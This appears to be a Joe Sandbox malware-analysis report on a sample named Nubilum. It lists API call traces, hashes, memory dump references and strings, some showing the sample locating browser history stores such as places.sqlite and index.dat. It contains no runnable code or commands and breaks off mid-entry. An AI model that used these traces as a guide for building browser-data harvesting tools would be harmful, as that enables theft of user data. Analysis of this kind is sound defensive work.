                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                          APIs
                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                          • String ID:
                          • API String ID: 1042154641-0
                          • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                          • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                          APIs
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                          • memset.MSVCRT ref: 00403A55
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                          • String ID: history.dat$places.sqlite
                          • API String ID: 3093078384-467022611
                          • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                          • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                          APIs
                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                          • GetLastError.KERNEL32 ref: 00417627
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLast$File$PointerRead
                          • String ID:
                          • API String ID: 839530781-0
                          • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                          • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID: *.*$index.dat
                          • API String ID: 1974802433-2863569691
                          • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                          • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                          • Opcode Fuzzy Hash: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                          • GetLastError.KERNEL32 ref: 004175A2
                          • GetLastError.KERNEL32 ref: 004175A8
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$ChangeCloseCreateFindNotificationTime
                          • String ID:
                          • API String ID: 1631957507-0
                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Temp$DirectoryFileNamePathWindows
                          • String ID:
                          • API String ID: 1125800050-0
                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID:
                          • String ID: d
                          • API String ID: 0-2564639436
                          • Opcode ID: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                          • Opcode Fuzzy Hash: 8b82e4f5ef2bc7d58288eb7d352e73fde76eaac7bad66d9443978647085fe40b
                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: BINARY
                          • API String ID: 2221118986-907554435
                          • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                          • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                            • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                            • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                          • String ID:
                          • API String ID: 1161345128-0
                          • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                          • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /stext
                          • API String ID: 2081463915-3817206916
                          • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                          • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                          • String ID:
                          • API String ID: 159017214-0
                          • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                          • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                          APIs
                          Strings
                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: failed to allocate %u bytes of memory
                          • API String ID: 2803490479-1168259600
                          • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                          • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                          • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                          • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcmpmemset
                          • String ID:
                          • API String ID: 1065087418-0
                          • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                          • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                          APIs
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                          • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                          APIs
                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                          • String ID:
                          • API String ID: 1481295809-0
                          • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                          • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                          APIs
                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 3150196962-0
                          • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                          • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                          APIs
                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
